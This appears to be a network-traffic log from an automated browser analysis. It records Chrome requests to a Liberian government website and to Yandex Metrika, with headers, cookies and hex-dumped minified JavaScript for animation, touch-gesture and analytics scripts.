                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
                                                                                                                        2025-01-10 13:54:50 UTC371INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:50 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 09:26:19 GMT
                                                                                                                        ETag: "28681-60e94060dc9d4"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 165505
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:50 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:50 UTC7821INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 69 66 28 65 5b 72 5d 29 72 65 74 75 72 6e 20 65 5b 72 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 69 3d 65 5b 72 5d 3d 7b 69 3a 72 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 74 5b 72 5d 2e 63 61 6c 6c 28 69 2e 65 78 70 6f 72 74 73 2c 69 2c 69 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 69 2e 6c 3d 21 30 2c 69 2e 65 78 70 6f 72 74 73 7d 6e 2e 6d 3d 74 2c 6e 2e 63 3d 65 2c 6e 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 6e 2e 6f 28 74 2c 65 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 65 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 72 7d 29 7d 2c 6e 2e 72 3d 66 75 6e
                                                                                                                        Data Ascii: !function(t){var e={};function n(r){if(e[r])return e[r].exports;var i=e[r]={i:r,l:!1,exports:{}};return t[r].call(i.exports,i,i.exports,n),i.l=!0,i.exports}n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:r})},n.r=fun
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 77 69 70 65 44 6f 77 6e 7d 66 75 6e 63 74 69 6f 6e 20 6c 74 28 29 7b 72 65 74 75 72 6e 20 58 3d 3d 3d 5f 2e 66 69 6e 67 65 72 73 7c 7c 5f 2e 66 69 6e 67 65 72 73 3d 3d 3d 68 7c 7c 21 64 7d 66 75 6e 63 74 69 6f 6e 20 68 74 28 29 7b 72 65 74 75 72 6e 20 30 21 3d 3d 59 5b 30 5d 2e 65 6e 64 2e 78 7d 66 75 6e 63 74 69 6f 6e 20 63 74 28 29 7b 72 65 74 75 72 6e 20 5f 2e 74 61 70 7d 66 75 6e 63 74 69 6f 6e 20 66 74 28 29 7b 72 65 74 75 72 6e 21 21 5f 2e 64 6f 75 62 6c 65 54 61 70 7d 66 75 6e 63 74 69 6f 6e 20 70 74 28 29 7b 69 66 28 6e 75 6c 6c 3d 3d 56 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 74 3d 46 74 28 29 3b 72 65 74 75 72 6e 20 66 74 28 29 26 26 74 2d 56 3c 3d 5f 2e 64 6f 75 62 6c 65 54 61 70 54 68 72 65 73 68 6f 6c 64 7d 66 75 6e 63 74 69 6f 6e 20 64 74
                                                                                                                        Data Ascii: wipeDown}function lt(){return X===_.fingers||_.fingers===h||!d}function ht(){return 0!==Y[0].end.x}function ct(){return _.tap}function ft(){return!!_.doubleTap}function pt(){if(null==V)return!1;var t=Ft();return ft()&&t-V<=_.doubleTapThreshold}function dt
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 6e 20 74 7d 2c 46 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 70 61 72 65 6e 74 3b 65 26 26 65 2e 70 61 72 65 6e 74 3b 29 65 2e 5f 64 69 72 74 79 3d 31 2c 65 2e 74 6f 74 61 6c 44 75 72 61 74 69 6f 6e 28 29 2c 65 3d 65 2e 70 61 72 65 6e 74 3b 72 65 74 75 72 6e 20 74 7d 2c 45 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 5f 72 65 70 65 61 74 3f 62 74 28 74 2e 5f 74 54 69 6d 65 2c 74 3d 74 2e 64 75 72 61 74 69 6f 6e 28 29 2b 74 2e 5f 72 44 65 6c 61 79 29 2a 74 3a 30 7d 2c 62 74 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 74 2f 3d 65 29 3b 72 65 74 75 72 6e 20 74 26 26 6e 3d 3d 3d 74 3f 6e 2d 31 3a 6e 7d 2c 54 74 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65
                                                                                                                        Data Ascii: n t},Ft=function(t){for(var e=t.parent;e&&e.parent;)e._dirty=1,e.totalDuration(),e=e.parent;return t},Et=function(t){return t._repeat?bt(t._tTime,t=t.duration()+t._rDelay)*t:0},bt=function(t,e){var n=Math.floor(t/=e);return t&&n===t?n-1:n},Tt=function(t,e
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 22 3a 22 72 67 62 61 28 22 2c 68 3d 30 3b 69 66 28 21 75 29 72 65 74 75 72 6e 20 74 3b 69 66 28 75 3d 75 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 28 74 3d 61 65 28 74 2c 65 2c 31 29 29 26 26 6c 2b 28 65 3f 74 5b 30 5d 2b 22 2c 22 2b 74 5b 31 5d 2b 22 25 2c 22 2b 74 5b 32 5d 2b 22 25 2c 22 2b 74 5b 33 5d 3a 74 2e 6a 6f 69 6e 28 22 2c 22 29 29 2b 22 29 22 7d 29 29 2c 6e 26 26 28 6f 3d 75 65 28 74 29 2c 28 72 3d 6e 2e 63 29 2e 6a 6f 69 6e 28 61 29 21 3d 3d 6f 2e 63 2e 6a 6f 69 6e 28 61 29 29 29 66 6f 72 28 73 3d 28 69 3d 74 2e 72 65 70 6c 61 63 65 28 68 65 2c 22 31 22 29 2e 73 70 6c 69 74 28 59 29 29 2e 6c 65 6e 67 74 68 2d 31 3b 68 3c 73 3b 68 2b 2b 29 61 2b 3d 69 5b 68 5d 2b 28 7e 72 2e 69 6e 64 65 78 4f 66 28 68 29 3f 75 2e
                                                                                                                        Data Ascii: ":"rgba(",h=0;if(!u)return t;if(u=u.map((function(t){return(t=ae(t,e,1))&&l+(e?t[0]+","+t[1]+"%,"+t[2]+"%,"+t[3]:t.join(","))+")"})),n&&(o=ue(t),(r=n.c).join(a)!==o.c.join(a)))for(s=(i=t.replace(he,"1").split(Y)).length-1;h<s;h++)a+=i[h]+(~r.indexOf(h)?u.
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 30 3f 2d 32 3a 74 2c 4e 74 28 74 68 69 73 29 29 3a 2d 32 3d 3d 3d 74 68 69 73 2e 5f 72 65 70 65 61 74 3f 31 2f 30 3a 74 68 69 73 2e 5f 72 65 70 65 61 74 7d 2c 65 2e 72 65 70 65 61 74 44 65 6c 61 79 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 74 69 6d 65 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 72 44 65 6c 61 79 3d 74 2c 4e 74 28 74 68 69 73 29 2c 65 3f 74 68 69 73 2e 74 69 6d 65 28 65 29 3a 74 68 69 73 7d 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 72 44 65 6c 61 79 7d 2c 65 2e 79 6f 79 6f 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3f 28 74 68 69 73 2e 5f 79 6f 79 6f 3d 74 2c 74 68 69 73 29 3a 74 68 69
                                                                                                                        Data Ascii: 0?-2:t,Nt(this)):-2===this._repeat?1/0:this._repeat},e.repeatDelay=function(t){if(arguments.length){var e=this._time;return this._rDelay=t,Nt(this),e?this.time(e):this}return this._rDelay},e.yoyo=function(t){return arguments.length?(this._yoyo=t,this):thi
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 72 65 63 65 6e 74 7d 2c 6e 2e 6e 65 78 74 4c 61 62 65 6c 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 74 68 69 73 2e 5f 74 69 6d 65 29 2c 65 65 28 74 68 69 73 2c 58 74 28 74 68 69 73 2c 74 29 29 7d 2c 6e 2e 70 72 65 76 69 6f 75 73 4c 61 62 65 6c 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 74 68 69 73 2e 5f 74 69 6d 65 29 2c 65 65 28 74 68 69 73 2c 58 74 28 74 68 69 73 2c 74 29 2c 31 29 7d 2c 6e 2e 63 75 72 72 65 6e 74 4c 61 62 65 6c 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3f 74 68 69 73 2e 73 65 65 6b 28 74 2c 21 30 29 3a 74 68 69
                                                                                                                        Data Ascii: return this._recent},n.nextLabel=function(t){return void 0===t&&(t=this._time),ee(this,Xt(this,t))},n.previousLabel=function(t){return void 0===t&&(t=this._time),ee(this,Xt(this,t),1)},n.currentLabel=function(t){return arguments.length?this.seek(t,!0):thi
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 74 3a 72 2c 6e 2c 65 29 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 74 54 69 6d 65 3d 30 2c 74 68 69 73 3b 69 66 28 64 21 3d 3d 74 68 69 73 2e 5f 64 75 72 29 72 65 74 75 72 6e 20 74 68 69 73 2e 72 65 6e 64 65 72 28 74 2c 65 2c 6e 29 7d 69 66 28 74 68 69 73 2e 5f 74 54 69 6d 65 3d 67 2c 74 68 69 73 2e 5f 74 69 6d 65 3d 72 2c 21 74 68 69 73 2e 5f 61 63 74 26 26 74 68 69 73 2e 5f 74 73 26 26 28 74 68 69 73 2e 5f 61 63 74 3d 31 2c 74 68 69 73 2e 5f 6c 61 7a 79 3d 30 29 2c 74 68 69 73 2e 72 61 74 69 6f 3d 6c 3d 28 63 7c 7c 74 68 69 73 2e 5f 65 61 73 65 29 28 72 2f 64 29 2c 74 68 69 73 2e 5f 66 72 6f 6d 26 26 28 74 68 69 73 2e 72 61 74 69 6f 3d 6c 3d 31 2d 6c 29 2c 72 26 26 21 66 26 26 21 65 26 26 28 6e 65 28 74 68 69 73 2c 22 6f 6e 53 74 61 72 74 22 29 2c 74 68
                                                                                                                        Data Ascii: t:r,n,e))return this._tTime=0,this;if(d!==this._dur)return this.render(t,e,n)}if(this._tTime=g,this._time=r,!this._act&&this._ts&&(this._act=1,this._lazy=0),this.ratio=l=(c||this._ease)(r/d),this._from&&(this.ratio=l=1-l),r&&!f&&!e&&(ne(this,"onStart"),th
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3a 74 29 7d 7d 2c 6d 61 70 52 61 6e 67 65 3a 74 65 2c 70 69 70 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 65 3d 6e 65 77 20 41 72 72 61 79 28 74 29 2c 6e 3d 30 3b 6e 3c 74 3b 6e 2b 2b 29 65 5b 6e 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 72 65 64 75 63 65 28 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 65 28 74 29 7d 29 2c 74 29 7d 7d 2c 75 6e 69 74 69 7a 65 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 28 70 61 72 73 65 46 6c 6f 61 74 28 6e 29
                                                                                                                        Data Ascii: ateElement("div"):t)}},mapRange:te,pipe:function(){for(var t=arguments.length,e=new Array(t),n=0;n<t;n++)e[n]=arguments[n];return function(t){return e.reduce((function(t,e){return e(t)}),t)}},unitize:function(t,e){return function(n){return t(parseFloat(n)
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 6e 29 2c 75 26 26 28 75 2e 73 76 67 26 26 6f 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 74 72 61 6e 73 66 6f 72 6d 22 29 2c 72 72 28 6f 2c 31 29 2c 75 2e 75 6e 63 61 63 68 65 3d 31 29 29 7d 7d 2c 51 6e 3d 7b 63 6c 65 61 72 50 72 6f 70 73 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 72 2c 69 29 7b 69 66 28 22 69 73 46 72 6f 6d 53 74 61 72 74 22 21 3d 3d 69 2e 64 61 74 61 29 7b 76 61 72 20 6f 3d 74 2e 5f 70 74 3d 6e 65 77 20 24 65 28 74 2e 5f 70 74 2c 65 2c 6e 2c 30 2c 30 2c 4b 6e 29 3b 72 65 74 75 72 6e 20 6f 2e 75 3d 72 2c 6f 2e 70 72 3d 2d 31 30 2c 6f 2e 74 77 65 65 6e 3d 69 2c 74 2e 5f 70 72 6f 70 73 2e 70 75 73 68 28 6e 29 2c 31 7d 7d 7d 2c 5a 6e 3d 5b 31 2c 30 2c 30 2c 31 2c 30 2c 30 5d 2c 24 6e 3d 7b 7d 2c 4a 6e 3d 66 75 6e 63 74 69 6f
                                                                                                                        Data Ascii: n),u&&(u.svg&&o.removeAttribute("transform"),rr(o,1),u.uncache=1))}},Qn={clearProps:function(t,e,n,r,i){if("isFromStart"!==i.data){var o=t._pt=new $e(t._pt,e,n,0,0,Kn);return o.u=r,o.pr=-10,o.tween=i,t._props.push(n),1}}},Zn=[1,0,0,1,0,0],$n={},Jn=functio
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 69 73 2c 62 2c 22 76 69 73 69 62 69 6c 69 74 79 22 2c 75 3f 22 69 6e 68 65 72 69 74 22 3a 22 68 69 64 64 65 6e 22 2c 61 3f 22 69 6e 68 65 72 69 74 22 3a 22 68 69 64 64 65 6e 22 2c 21 61 29 29 2c 22 73 63 61 6c 65 22 21 3d 3d 63 26 26 22 74 72 61 6e 73 66 6f 72 6d 22 21 3d 3d 63 26 26 7e 28 63 3d 76 6e 5b 63 5d 29 2e 69 6e 64 65 78 4f 66 28 22 2c 22 29 26 26 28 63 3d 63 2e 73 70 6c 69 74 28 22 2c 22 29 5b 30 5d 29 29 2c 67 3d 63 20 69 6e 20 63 6e 29 69 66 28 44 7c 7c 28 28 6d 3d 74 2e 5f 67 73 61 70 29 2e 72 65 6e 64 65 72 54 72 61 6e 73 66 6f 72 6d 26 26 21 65 2e 70 61 72 73 65 54 72 61 6e 73 66 6f 72 6d 7c 7c 72 72 28 74 2c 65 2e 70 61 72 73 65 54 72 61 6e 73 66 6f 72 6d 29 2c 5f 3d 21 31 21 3d 3d 65 2e 73 6d 6f 6f 74 68 4f 72 69 67 69 6e 26 26 6d 2e 73
                                                                                                                        Data Ascii: is,b,"visibility",u?"inherit":"hidden",a?"inherit":"hidden",!a)),"scale"!==c&&"transform"!==c&&~(c=vn[c]).indexOf(",")&&(c=c.split(",")[0])),g=c in cn)if(D||((m=t._gsap).renderTransform&&!e.parseTransform||rr(t,e.parseTransform),_=!1!==e.smoothOrigin&&m.s


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        61192.168.2.74985877.88.21.1194432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:50 UTC700OUTGET /metrika/metrika_match.html HTTP/1.1
                                                                                                                        Host: mc.yandex.com
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                        Sec-Fetch-Dest: iframe
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:50 UTC1316INHTTP/1.1 200 OK
                                                                                                                        Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Cache-Control: max-age=3600
                                                                                                                        Connection: Close
                                                                                                                        Content-Length: 5498
                                                                                                                        Content-Type: text/html
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:50 GMT
                                                                                                                        ETag: "677fcb03-157a"
                                                                                                                        Expires: Fri, 10 Jan 2025 14:54:50 GMT
                                                                                                                        Last-Modified: Thu, 09 Jan 2025 13:11:31 GMT
                                                                                                                        Set-Cookie: _yasc=naIPyTB5z5dpt7MAQ9cnQfsrECOxlY0yFu48Kf6BP9dW95fQfX3lTkpTdlN7/Hoa56BG; domain=.yandex.com; path=/; expires=Mon, 08 Jan 2035 13:54:50 GMT; secure
                                                                                                                        Set-Cookie: i=xTfAm41PSHxMCjvulY2kA1mGcr1HVxOxjoEOoCCiIR7RaLGqQDX9+aF6sWK72Ndwme84ig+Cwlxni1WIzfCvCXTbLNU=; Expires=Sun, 10-Jan-2027 13:54:50 GMT; Domain=.yandex.com; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                        Set-Cookie: yandexuid=1567803181736517290; Expires=Sun, 10-Jan-2027 13:54:50 GMT; Domain=.yandex.com; Path=/; Secure; SameSite=None
                                                                                                                        Set-Cookie: yashr=3155343561736517290; Path=/; Domain=.yandex.com; Expires=Sat, 10 Jan 2026 13:54:50 GMT; SameSite=None; Secure; HttpOnly
                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                        Timing-Allow-Origin: *
                                                                                                                        2025-01-10 13:54:50 UTC3647INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8"> <meta name="viewp
                                                                                                                        2025-01-10 13:54:50 UTC1851INData Raw: 74 69 6d 65 6f 75 74 26 26 28 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 6c 5b 61 5d 2e 74 69 6d 65 6f 75 74 29 2c 6c 5b 61 5d 2e 74 69 6d 65 6f 75 74 3d 30 2c 63 26 26 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 5b 22 73 63 2e 69 6d 61 67 65 22 2c 61 2c 62 5d 2e 6a 6f 69 6e 28 22 2a 22 29 2c 22 2a 22 29 29 2c 6c 5b 61 5d 2e 67 3d 6e 75 6c 6c 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 78 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 3b 66 6f 72 28 64 3d 30 3b 64 3c 62 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 69 66 28 62 5b 64 5d 3d 3d 3d 61 29 72 65 74 75 72 6e 21 30 3b 66 6f 72 28 64 3d 30 3b 64 3c 63 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 69 66 28 63 5b 64 5d 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 66 75
                                                                                                                        Data Ascii: timeout&&(clearTimeout(l[a].timeout),l[a].timeout=0,c&&window.parent.postMessage(["sc.image",a,b].join("*"),"*")),l[a].g=null)}}function x(a,b,c){var d;for(d=0;d<b.length;d++)if(b[d]===a)return!0;for(d=0;d<c.length;d++)if(c[d].test(a))return!0;return!1}fu


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        62192.168.2.74986193.158.134.1194432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:50 UTC512OUTGET /metrika/tag.js HTTP/1.1
                                                                                                                        Host: mc.yandex.ru
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: i=Ye2LpebK8L/KBVpw9aBhIoa3pbhwtEqfTBSc1BnViQeh91JgbESauH0yTfYegws1ftPKGd6rKaj8KvqSxWNFbqkQ5Kc=; yandexuid=8715430261736517288; yashr=3268409401736517288
                                                                                                                        2025-01-10 13:54:50 UTC851INHTTP/1.1 200 OK
                                                                                                                        Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Cache-Control: max-age=3600
                                                                                                                        Connection: Close
                                                                                                                        Content-Length: 227261
                                                                                                                        Content-Type: application/javascript
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:50 GMT
                                                                                                                        ETag: "677fcb03-377bd"
                                                                                                                        Expires: Fri, 10 Jan 2025 14:54:50 GMT
                                                                                                                        Last-Modified: Thu, 09 Jan 2025 13:11:31 GMT
                                                                                                                        Set-Cookie: _yasc=ncboDolQxhRKAww1n8Z28QrlTwhnAsLkegjL7h7VT8khZbkb5mArd21vPFFO3h3tjnQ=; domain=.yandex.ru; path=/; expires=Mon, 08 Jan 2035 13:54:50 GMT; secure
                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                        Timing-Allow-Origin: *
                                                                                                                        2025-01-10 13:54:50 UTC3921INData Raw: ef bb bf 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 4c 61 28 62 61 29 7b 76 61 72 20 74 61 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 61 3c 62 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 62 61 5b 74 61 2b 2b 5d 7d 3a 7b 64 6f 6e 65 3a 21 30 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 75 28 62 61 29 7b 76 61 72 20 74 61 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 62 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 74 61 29 72 65 74 75 72 6e 20 74 61 2e 63 61 6c 6c 28 62 61 29 3b 69 66 28 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 62 61 2e 6c 65 6e 67 74 68
                                                                                                                        Data Ascii: (function(){function La(ba){var ta=0;return function(){return ta<ba.length?{done:!1,value:ba[ta++]}:{done:!0}}}function u(ba){var ta="undefined"!=typeof Symbol&&Symbol.iterator&&ba[Symbol.iterator];if(ta)return ta.call(ba);if("number"==typeof ba.length
                                                                                                                        2025-01-10 13:54:50 UTC8168INData Raw: 66 28 6b 29 72 65 74 75 72 6e 21 31 7d 65 6c 73 65 20 69 66 28 21 6b 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 28 62 26 63 29 7c 7c 54 28 61 2c 22 64 6f 6d 61 69 6e 22 29 26 26 65 21 3d 3d 64 2e 64 6f 6d 61 69 6e 7c 7c 54 28 61 2c 22 70 61 74 68 22 29 26 26 66 21 3d 3d 64 2e 70 61 74 68 7c 7c 54 28 61 2c 22 73 65 63 75 72 65 22 29 26 26 28 31 3d 3d 3d 67 26 26 21 64 2e 73 65 63 75 72 65 7c 7c 32 3d 3d 3d 67 26 26 64 2e 73 65 63 75 72 65 29 3f 21 31 3a 21 30 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 52 6d 28 61 2c 62 2c 63 29 7b 62 3d 51 62 28 61 2c 62 29 3b 69 66 28 21 62 2e 70 72 6f 74 6f 63 6f 6c 7c 7c 22 68 74 74 70 73 3a 22 21 3d 3d 62 2e 70 72 6f 74 6f 63 6f 6c 29 72 65 74 75 72 6e 21 31 3b 61 3d 51 62 28 61 2c 63 29 3b 72 65
                                                                                                                        Data Ascii: f(k)return!1}else if(!k)return!1;return!(b&c)||T(a,"domain")&&e!==d.domain||T(a,"path")&&f!==d.path||T(a,"secure")&&(1===g&&!d.secure||2===g&&d.secure)?!1:!0}return!1}function Rm(a,b,c){b=Qb(a,b);if(!b.protocol||"https:"!==b.protocol)return!1;a=Qb(a,c);re
